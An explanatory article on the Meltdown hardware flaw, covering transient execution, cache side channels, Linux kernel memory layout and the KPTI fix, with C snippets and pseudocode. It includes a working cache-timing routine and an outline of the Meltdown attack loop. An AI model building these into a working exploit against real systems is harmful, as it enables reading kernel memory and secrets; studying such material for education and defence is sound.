Meltdown
Meltdown is a hardware bug that was discovered in 2017 and took the world by storm when it was publicly disclosed in January 2018. It's called Meltdown because it melts the boundary between the kernel and applications. Basically, it breaks the most fundamental guarantee of modern operating systems, which is address space isolation: every process has its own address space, isolated from other processes and from the operating system, for obvious security reasons. Meltdown exploits the drive of modern CPUs to get faster and faster, which sacrificed security in non-obvious ways.
1. Hardware
CPU speeds have improved much faster than memory speeds, so CPUs started getting clever and now use a variety of techniques to compensate for the memory speed deficit. The bug affects most Intel CPUs and a few ARM cores (for example the Cortex-A75); AMD CPUs are reported not to be affected by Meltdown itself. Modern CPUs are state of the art when it comes to engineering and are built to perform really well; to do that they use many techniques like pipelines, caches, superscalar execution, branch prediction, and so on.
The pipeline keeps a continuous stream of instructions flowing through the CPU. Just like a factory assembly line, execution is split into many small steps (fetch, decode, execute, write back). There is a small problem with branch instructions, though: the CPU would need to stall the pipeline until the branch is executed and the next program counter is known, and only then could the pipeline resume. Obviously this reduces CPU throughput (instructions per cycle). To mitigate that, the CPU predicts the outcome of the branch (as an example, let's assume the prediction is: not taken) and keeps the pipeline going. The instructions after the branch are executed transiently, in a temporary state, similar to a transaction in Intel TSX. Another problem with transient execution is that, on affected CPUs, memory protection checks are not enforced until the instruction retires, so a transient load can already use data it has no right to read.
Later, if the branch indeed wasn't taken, the temporary state is committed to the architectural state of the CPU (the state defined by the ISA), which means it becomes visible to software. Otherwise (branch taken) the results are thrown away and the pipeline is flushed. This is all good: the CPU runs at full speed and software has no idea what happened. Except that transient execution also affects the microarchitectural state, such as the caches, and that part is not rolled back. This should never have been a problem, because the microarchitecture is not part of the ISA and isn't exposed directly to software.
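To make the prediction step a bit more concrete, here is a minimal sketch of a 2-bit saturating counter, a classic textbook predictor. It is only an illustration: real CPUs use far more elaborate predictors, and the names `predictor_t`, `predict`, `train` and `count_mispredictions` are made up for this example.

```c
#include <stdbool.h>
#include <stddef.h>

/* 2-bit saturating counter: 0 and 1 predict "not taken", 2 and 3 predict "taken".
 * Illustrative only; not the predictor of any particular CPU. */
typedef struct {
    unsigned counter; /* always in the range 0..3 */
} predictor_t;

bool predict(const predictor_t *p) {
    return p->counter >= 2;
}

/* Train the predictor with the real outcome once the branch has resolved. */
void train(predictor_t *p, bool taken) {
    if (taken && p->counter < 3)
        p->counter++;
    else if (!taken && p->counter > 0)
        p->counter--;
}

/* Replay a branch history and count mispredictions. Each misprediction stands
 * for one pipeline flush where transiently executed work is thrown away. */
size_t count_mispredictions(predictor_t *p, const bool *outcomes, size_t n) {
    size_t misses = 0;
    for (size_t i = 0; i < n; i++) {
        if (predict(p) != outcomes[i])
            misses++;
        train(p, outcomes[i]);
    }
    return misses;
}
```

Feeding it the history of a loop branch (taken many times, then not taken once) shows that the predictor is wrong only while warming up and at the loop exit, and those are exactly the moments where the CPU executes instructions transiently on the wrong path.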
But people quickly found that it's possible to leak data from the cache through side-channel attacks: by carefully measuring access times, you can figure out whether a piece of data is in the cache or not.
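The timing measurement can be sketched roughly like this. It assumes an x86 CPU and GCC or Clang (for the `x86intrin.h` intrinsics); the helper names `time_access` and `min_latency` are invented for this example, and the actual tick counts differ from machine to machine.

```c
#include <stdint.h>
#include <x86intrin.h> /* __rdtsc, _mm_clflush, _mm_mfence, _mm_lfence (x86 only) */

/* Time a single load from addr, in timestamp-counter ticks. */
uint64_t time_access(const volatile uint8_t *addr) {
    _mm_mfence();              /* wait for earlier loads, stores and flushes */
    _mm_lfence();
    uint64_t start = __rdtsc();
    _mm_lfence();              /* keep the load from starting before the first read */
    (void)*addr;               /* the load being timed */
    _mm_lfence();              /* wait for the load before reading the counter again */
    uint64_t end = __rdtsc();
    return end - start;
}

/* Smallest latency seen over `trials` loads. If flush is non-zero the cache
 * line is evicted before every load, otherwise it is warmed up first. */
uint64_t min_latency(const volatile uint8_t *addr, int trials, int flush) {
    uint64_t best = UINT64_MAX;
    for (int i = 0; i < trials; i++) {
        if (flush)
            _mm_clflush((const void *)addr);
        else
            (void)*addr;
        uint64_t t = time_access(addr);
        if (t < best)
            best = t;
    }
    return best;
}
```

On real hardware the flushed case should come out clearly slower than the warmed-up case, and a threshold somewhere between the two numbers is what separates "in cache" from "not in cache".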
2. Software
Every operating system that runs on an affected x86 CPU and maps the kernel into the address space of user processes is susceptible to Meltdown, but we're going to focus on Linux because it's free software :). Linux creates a set of page tables for each new process, and each set of page tables represents an address space. The address space of every process is split in two: the lower half is occupied by userspace and the upper half by the kernel, so the kernel half is basically shared between all processes. This makes switching between userspace and kernel space (syscalls, interrupts, ...) a lot faster than if the kernel had its own separate address space and had to change address spaces on every switch. So the only real isolation between the kernel and userspace is access rights: Linux kernel pages are accessible only in supervisor mode, which is the mode the kernel runs in.
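As a small illustration of the split, the sketch below classifies a virtual address as belonging to the user half or the kernel half. It assumes x86-64 with 4-level paging (48-bit virtual addresses); `addr_half_t` and `classify_address` are names made up for this example.

```c
#include <stdint.h>

typedef enum { ADDR_USER, ADDR_KERNEL, ADDR_NON_CANONICAL } addr_half_t;

/* Assumes x86-64 with 4-level paging: 48-bit virtual addresses where
 * bits 63..47 must all be copies of bit 47 ("canonical" form). */
addr_half_t classify_address(uint64_t vaddr) {
    uint64_t top = vaddr >> 47;   /* the 17 uppermost bits */
    if (top == 0)
        return ADDR_USER;         /* 0x0000000000000000-0x00007fffffffffff */
    if (top == 0x1ffff)
        return ADDR_KERNEL;       /* 0xffff800000000000-0xffffffffffffffff */
    return ADDR_NON_CANONICAL;    /* the hole between the two halves */
}
```

Both halves live in the same page tables; the only thing that stops userspace from reading an `ADDR_KERNEL` address is the supervisor bit in the page table entries.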
3. Meltdown Exploit
Meltdown exploits the two points above (features that turned out to be bugs): the kernel being mapped into every process on the software side, and transient execution with its cache side effects on the hardware side. It works by tricking the CPU into transiently executing code that is architecturally never reached, for example code that follows a mispredicted branch or an instruction that raises an exception. In that dead code we can access anywhere in virtual memory. This alone is still useless, because even if the CPU executes our code transiently it will inevitably throw away the result, so we never get to see the data directly. This is where the cache comes into play, but not in the way you might think. We create an array of 256 elements (2^8, the number of possible values of a byte), where each element has the size of a CPU cache line (each memory access fills a whole cache line), and we flush it from the cache. Real exploits usually space the elements a page (4 KiB) apart so that the hardware prefetcher doesn't pull in neighboring elements. That array is used to leak data to the outside world. In our dead code we have already read some forbidden data, and we use that data as an index into our crafted array (we do this one byte at a time). At this point the data has been leaked and we only need to find out what it is, by measuring the access time of each of the array's elements: if an access is significantly faster than a normal read from memory, we conclude that the element is in the CPU cache, so the leaked byte is that element's index. We can read the entire kernel address space like this. On x86_64 we can even read the entire physical memory, because Linux maps all physical RAM into the range 0xffff888000000000-0xffffc87fffffffff (with 4-level paging, when KASLR doesn't randomize the base).
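To see how a physical address ends up inside that range, here is a minimal sketch of the translation. It assumes the fixed window quoted above (so no KASLR); the macro names and `phys_to_direct_map` are invented for this example and are not the kernel's own helpers.

```c
#include <stdbool.h>
#include <stdint.h>

/* Direct-map window quoted in the text; assumed fixed, i.e. KASLR disabled. */
#define DIRECT_MAP_START 0xffff888000000000ULL
#define DIRECT_MAP_END   0xffffc87fffffffffULL

/* Compute the kernel virtual address that aliases physical address `phys`.
 * Returns false if phys does not fit inside the 64 TiB window. */
bool phys_to_direct_map(uint64_t phys, uint64_t *virt) {
    if (phys > DIRECT_MAP_END - DIRECT_MAP_START)
        return false;
    *virt = DIRECT_MAP_START + phys;
    return true;
}
```

So leaking, say, physical address 0x1000 just means pointing the attack at virtual address 0xffff888000001000.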
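A simple example of the attack would look like this (pseudo code):
flush(probe_array); // make sure no element of the array is cached
raise_exception();
// the lines below are never reached architecturally,
// but the cpu may still execute them transiently
unsigned char data = read(illegal_address);
access(probe_array[data * CACHE_LINE_SIZE]);
Then we probe the array, one cache line per possible byte value:
for (int i = 0; i < 256; i++) {
    // a fast access means this line was cached by the transient access
    if (measure(probe_array[i * CACHE_LINE_SIZE]) < cache_access_threshold)
        leaked_data = i;
}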
4. Solution
The fundamental problem comes from the side effects of the hardware's microarchitecture. But CPUs can't just be fixed quickly; it takes a long time to get a new generation of CPUs with proper mitigations, so the solution is software based. In Linux the implemented solution is called KPTI, or kernel page table isolation. It basically separates the kernel and userspace page tables so that each has its own address space. This neutralizes the attack, but as a side effect it makes the system slower than before: every switch between userspace and the kernel now also switches page tables, so syscall-heavy workloads are hit the hardest.
Notice that the kernel still maps userspace pages into its own address space because it needs to access them. Userspace, on the other hand, no longer has kernel pages mapped at all, apart from the minimal entry and exit code needed to switch into the kernel.
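To check whether a running Linux system has the mitigation enabled, you can read the status the kernel exposes in sysfs. The sketch below assumes a kernel recent enough to provide `/sys/devices/system/cpu/vulnerabilities/meltdown` and the usual status strings ("Not affected", "Vulnerable", "Mitigation: PTI"); `md_status_t`, `parse_meltdown_status` and `read_meltdown_status` are names made up for this example.

```c
#include <stdio.h>
#include <string.h>

typedef enum { MD_NOT_AFFECTED, MD_MITIGATED, MD_VULNERABLE, MD_UNKNOWN } md_status_t;

/* Classify one status line as reported by the kernel. */
md_status_t parse_meltdown_status(const char *line) {
    if (strncmp(line, "Not affected", 12) == 0)
        return MD_NOT_AFFECTED;
    if (strncmp(line, "Mitigation:", 11) == 0)
        return MD_MITIGATED;          /* e.g. "Mitigation: PTI" */
    if (strncmp(line, "Vulnerable", 10) == 0)
        return MD_VULNERABLE;
    return MD_UNKNOWN;
}

/* Read the status from sysfs; MD_UNKNOWN if the file is missing or unreadable. */
md_status_t read_meltdown_status(void) {
    char line[128] = "";
    FILE *f = fopen("/sys/devices/system/cpu/vulnerabilities/meltdown", "r");
    if (!f)
        return MD_UNKNOWN;
    if (!fgets(line, sizeof line, f))
        line[0] = '\0';
    fclose(f);
    return parse_meltdown_status(line);
}
```

A result of `MD_MITIGATED` on an affected CPU means KPTI is active; `MD_UNKNOWN` only says that this sketch could not tell.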